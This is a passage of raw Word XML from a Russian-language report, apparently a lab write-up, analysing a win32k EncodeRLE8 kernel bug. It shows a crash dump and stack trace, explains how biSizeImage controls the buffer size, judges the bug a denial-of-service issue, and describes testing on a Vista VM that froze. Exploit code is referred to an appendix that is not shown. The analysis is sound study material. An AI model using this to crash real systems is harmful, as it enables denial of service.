        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Это очень распространенная проверка на ошибку. </w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Обычно адрес исключения указывает на драйвер/функцию, вызвавшую проблему. Всегда записывайте этот адрес</w:t>
      </w:r>
      <w:r w:rsidR="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> а также дату ссылки драйвера/образа, содержащего этот адрес.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58219F33" w14:textId="2E1F64B4" w:rsidR="002B3FB0" w:rsidRPr="00031260" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Одна из</w:t>
      </w:r>
      <w:r w:rsidRPr="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> распространенны</w:t>
      </w:r>
      <w:r w:rsidR="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidRPr="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> проблем</w:t>
      </w:r>
      <w:r w:rsidR="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>- код исключения 0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">80000003. </w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Это означает, что </w:t>
      </w:r>
      <w:r w:rsidR="00031260">
        <w:t>hardcoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> точка останова или утверждение были достигнуты, но система была загружена</w:t>
      </w:r>
      <w:r w:rsidR="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> с параметром</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r>
        <w:t>NODEBUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">.  Этого не должно происходить, так как разработчики никогда не должны </w:t>
      </w:r>
      <w:r w:rsidR="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>хардкодить</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> точки останова в розничном коде, но ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6052619D" w14:textId="4BA57996" w:rsidR="002B3FB0" w:rsidRPr="00031260" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  Если это произошло, убедитесь, что отладчик подключен, а система</w:t>
      </w:r>
      <w:r w:rsidR="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>загружается</w:t>
      </w:r>
      <w:r w:rsidR="000215CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> с параметром</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r>
        <w:t>DEBUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Это позволит нам увидеть, почему эта точка останова</w:t>
      </w:r>
      <w:r w:rsidR="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>происходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377AB23" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031260">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Аргументы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED3528" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0000005, Код исключения, которое не было обработано.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D1866" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2: 9461564</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, Адрес, по которому произошло исключение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DC4DD" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3: 9</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0539</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0, кадр ловушки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B63AE3" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4: 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FDDFD2" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21804E76" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Подробности</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>отладки</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3FB0">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524ED02B" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  ------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DBCB33" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FBDE2" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  TRAP_FRAME: 9d0539a0 -- (.trap 0xffffffff9d0539a0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72745AB8" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  ErrCode = 00000002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C939F4" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  eax=00291002 ebx=00291000 ecx=00000004 edx=fe9bb1c1 esi=000064 edi=fe9bb15c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1423F" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  eip=9461564b esp=9d053a14 ebp=9d053a40 iopl=0 nv up ei ng nz ac pe cy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17476D" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BE096" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  win32k!EncodeRLE8+0x1ac:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783B8FA" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9461564b c60300 mov byte ptr [ebx],0 ds:0023:00291000=???</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C2A88" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Сброс диапазона по умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C95E8" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888F1C9" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="003741FC" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>STACK</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B08E53" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3FB0">
        <w:t>9d052f5c 8172adff 00000003 17305ce1 00000065 nt!RtlpBreakWithStatusInstruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850EBFB" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d052fac 8172b8fd 00000003 9d0533b0 00000000 nt!KiBugCheckDebugBreak+0x1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379D054" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053370 8172ac9c 0000008e c0000005 9461564b nt!KeBugCheck2+0x68b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339FFAE" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053394 817002f7 0000008e c0000005 9461564b nt!KeBugCheckEx+0x1e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531295E5" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053930 81689996 9d05394c 00000000 9d0539a0 nt!KiDispatchException+0x1ac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D4A50" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053998 8168994a 9d053a40 9461564b badb0d00 nt!CommonDispatchException+0x4a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8838E" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053a40 944caea9 fe9bb1c1 ff290ffc 00000064 nt!KiExceptionExit+0x192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BA3AB" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053b04 944e8b09 00000028 9d053b5c 9d053b74 win32k!GreGetDIBitsInternalWorker+0x73e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92C318" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053b7c 944d390f 0c0101fb 1f050140 00000000 win32k!GreGetDIBitsInternal+0x21b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C533FBE" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053c08 81688db6 0c0101fb 1f050140 00000000 win32k!NtGdiGetDIBitsInternal+0x250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C13591" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  9d053c08 00135ba6 0c0101fb 1f050140 00000000 nt!KiSystemServicePostCall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30B179" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="0075529D" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDB01B" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0"/>
    <w:p w14:paraId="5259D5A6" w14:textId="152F9EA9" w:rsidR="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0">
      <w:r>
        <w:t xml:space="preserve">Хотя размер буфера, передаваемого в EncodeRLE[4,8], можно произвольно контролировать с помощью bmi.biSizeImage (32-битное поле), </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>это не позволяет злоумышленнику повреждать память режима ядра, поскольку запись в память происходит последовательно от начала до конца буфера. Более того, поскольку код в NtGdiGetDIBitsInternal() проверяет, что размер буфера, переданный в ProbeForWrite(), &gt;= 1, его базовый адрес должен находиться в пространстве пользователя. Таким образом, это похоже только на проблему DoS.</w:t>
      </w:r>
      <w:r w:rsidR="00BE71E0">
        <w:t xml:space="preserve"> Код эксплойта представлен в Приложении</w:t>
      </w:r>
      <w:r w:rsidR="00D90B89">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidR="00BE71E0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D03D1" w14:textId="7FD78DC1" w:rsidR="00E3146D" w:rsidRDefault="00414CC1" w:rsidP="00E3146D">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Тестирование эксплойта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825C92F" w14:textId="2418685D" w:rsidR="00414CC1" w:rsidRDefault="00414CC1" w:rsidP="00020A6C">
      <w:r>
        <w:t xml:space="preserve">Тестирование уязвимости проводилось на виртуальной машине под управлением ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CC1">
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CC1">
        <w:t>86</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. К сожалению, не удалось установить уязвимые версии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>7. Для настройки тестируемой ОС был создан именованный канал между вм и хостом. Далее в консоли были введены следующие сообщения (Рисунок 2)</w:t>
      </w:r>
      <w:r w:rsidR="00082AD0">
        <w:t>, после чего машина была перезагружена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE5DD8" w14:textId="13865936" w:rsidR="001F6121" w:rsidRDefault="00020A6C" w:rsidP="001F6121">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00020A6C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A548DBA" wp14:editId="3A07C37E">
            <wp:extent cx="5951220" cy="700405"/>
            <wp:effectExtent l="0" t="0" r="0"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rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect r="4086" b="26154"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5957229" cy="701112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00020A6C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB56E47" wp14:editId="69CDF4DB">
            <wp:extent cx="5940425" cy="879475"/>
            <wp:effectExtent l="0" t="0" r="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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="879475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B560C9" w14:textId="6BF876E0" w:rsidR="00BD34E9" w:rsidRPr="00A56875" w:rsidRDefault="001F6121" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00C74E90">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ― </w:t>
      </w:r>
      <w:r w:rsidR="00020A6C">
        <w:t>Настройка вм</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A2E5E" w14:textId="7B054113" w:rsidR="004A27C2" w:rsidRPr="00A17FC6" w:rsidRDefault="00A56875" w:rsidP="004A27C2">
      <w:r>
        <w:t xml:space="preserve">Далее на хосте была запущена утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и настроена на отладку ядра (с помощью установленного канала). Скомпилируем файлы </w:t>
      </w:r>
      <w:r w:rsidR="00AF7614">
        <w:t>уязвимости, перенесем на вм, и запустим от имени администратора</w:t>
      </w:r>
      <w:r w:rsidR="00334985">
        <w:t xml:space="preserve"> сначала первый, затем второй</w:t>
      </w:r>
      <w:r w:rsidR="00AF7614">
        <w:t xml:space="preserve">. К сожалению, синего экрана смерти получить не удалось, однако </w:t>
      </w:r>
      <w:r w:rsidR="00A17FC6">
        <w:t xml:space="preserve">машина зависла, что свидетельствует о наличии </w:t>
      </w:r>
      <w:r w:rsidR="00A17FC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
